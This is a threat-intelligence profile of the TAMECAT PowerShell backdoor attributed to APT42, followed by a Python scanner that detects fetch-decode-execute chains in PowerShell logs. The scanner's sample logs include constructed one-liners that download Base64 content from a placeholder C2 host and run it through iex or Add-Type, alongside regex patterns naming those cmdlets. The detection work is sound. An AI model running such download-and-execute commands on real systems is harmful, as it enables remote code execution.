| Tamecat | |
| --- | --- |
| Type of Malware | Backdoor |
| Country of Origin | Iran |
| Date of initial activity | March 2024 |
| Targeted Countries | Regions of interest to Iran |
| Associated Groups | APT42 |
| Motivation | Threat actors may use TAMECAT to access files, directories, applications, and more. With this access they can extract a wide range of sensitive information, including personal data, financial records, login credentials, and other valuable data. They may also use TAMECAT to deploy additional malware on the compromised systems. |
| Attack Vectors | Malicious links from typo-squatted domains masquerading as news articles, likely sent via spear phishing, that redirect the user to fake Google login pages. |
| Tools | ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers |
| Targeted System | Windows |
Overview
In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold capable of executing arbitrary PowerShell or C# content. TAMECAT is delivered by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT being used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, governments, or intergovernmental organizations worldwide.
Targets
Credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran; individuals or entities employed by or affiliated with NGOs, governments, or intergovernmental organizations around the world.
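As an added detection example (not from Mandiant's report or any TAMECAT sample), the following Python scanner runs over constructed PowerShell Script Block Logging text (Event ID 4104) and flags the behaviour chain the overview describes: content fetched over HTTP, Base64-decoded, and then executed as PowerShell (Invoke-Expression) or compiled as C# (Add-Type). The log lines, hostnames and regex patterns are constructed illustrations of that behaviour class, not TAMECAT indicators.

```python
import re
from dataclasses import dataclass

# Generic heuristics for the behaviour the overview describes (HTTP C2 traffic,
# Base64-decoded payload, execution of PowerShell or C#). Constructed, not IoCs.
HTTP_FETCH = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|DownloadString|DownloadData", re.I)
B64_DECODE = re.compile(r"FromBase64String", re.I)
PS_EXEC = re.compile(r"Invoke-Expression|\biex\b", re.I)
CS_EXEC = re.compile(r"Add-Type", re.I)


@dataclass
class Finding:
    line_no: int
    stages: tuple  # ordered stages matched, e.g. ("http", "base64", "powershell")


def classify(script_block: str) -> tuple:
    """Return which stages of the fetch-decode-execute chain appear in one script block."""
    stages = []
    if HTTP_FETCH.search(script_block):
        stages.append("http")
    if B64_DECODE.search(script_block):
        stages.append("base64")
    if PS_EXEC.search(script_block):
        stages.append("powershell")
    if CS_EXEC.search(script_block):
        stages.append("csharp")
    return tuple(stages)


def scan(log_lines) -> list:
    """Flag only blocks that show the full chain: HTTP fetch + Base64 decode + PS or C# execution."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        stages = classify(line)
        if "http" in stages and "base64" in stages and ("powershell" in stages or "csharp" in stages):
            findings.append(Finding(n, stages))
    return findings


# Constructed 4104-style ScriptBlockText lines; c2.example.invalid is a placeholder host.
SAMPLE_LOG = [
    r"ScriptBlockText: Get-ChildItem C:\Users -Recurse | Out-File inventory.txt",
    r"ScriptBlockText: $r=(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/t'); iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r)))",
    r"ScriptBlockText: $src=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String((Invoke-WebRequest 'http://c2.example.invalid/c').Content)); Add-Type -TypeDefinition $src",
    r"ScriptBlockText: [Convert]::FromBase64String($token) | Out-Null",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {' -> '.join(f.stages)}")
```

Requiring all three stages together keeps a lone Base64 decode (line 4 above) or a plain HTTP download from firing, which matters on hosts where administrators use those cmdlets routinely.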